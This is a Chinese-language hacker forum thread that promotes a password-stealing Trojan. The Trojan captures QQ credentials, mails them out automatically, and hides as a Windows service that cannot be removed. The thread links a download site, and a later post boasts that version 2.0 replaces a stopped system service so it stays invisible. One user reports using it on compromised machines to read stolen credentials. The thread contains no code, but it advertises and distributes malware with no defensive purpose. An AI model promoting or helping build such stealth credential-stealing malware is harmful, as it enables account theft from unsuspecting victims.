20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 成员网站论坛   » 木马园地   » 一个超级密码记录木马

   
作者 标题: 一个超级密码记录木马
47090005
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
该木马是用来监听各种密码的,如QQ号和密码,有自动发信功能,和top差不多,它的特点是把自己加到windows nt服务中,非常具有隐蔽性,如果在创建服务时不提供停止和删除功能,你即使知道种了木马也没有办法删除它,是不是很厉害?有兴趣的朋友可以到 http://yyt_hac.home.chinaren.com去下载测试版,多提些建议和看法,让我们共同来完善它
IP: 已记录
x-ray
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
呵呵
用冰河连上自己,一定可以删掉的,先删进程,再删程序
IP: 已记录
47090005
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
hi,那是服务进程,在本机是结束不了的,难道用冰河连上能结束吗?
IP: 已记录
风起
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
一物降一物,

服务进程就不能够删吗?

API应该是可以搞定的吧.?

IP: 已记录
没影
未注册


图标 12  发表于         编辑/删除帖子   引用原文回复  
风起:说具体点啊,我怀疑自己中了
IP: 已记录
x-ray
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
quote:
发贴人: 风起:
一物降一物,

服务进程就不能够删吗?

API应该是可以搞定的吧.?



是啦,风起啊,怎么用IPA搞定呢?
IP: 已记录
yyt_hac
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
不错,服务进程也是可以被杀掉的,现在黑暗天使2.0以进入调试阶段,它会随机选择一个状态为停止的系统服务并替换掉它,而被替换的服务属性看不出任何改变,而且任务管理器中也看不到任何增加的进程,够狠了吧
IP: 已记录
yyt_hac
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
黑暗天使2.0已经出来了,快去下载吧
IP: 已记录
没影
未注册


图标 12  发表于         编辑/删除帖子   引用原文回复  
我下了,效果很好,可以登陆肉鸡,就看邮件内容喽!
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。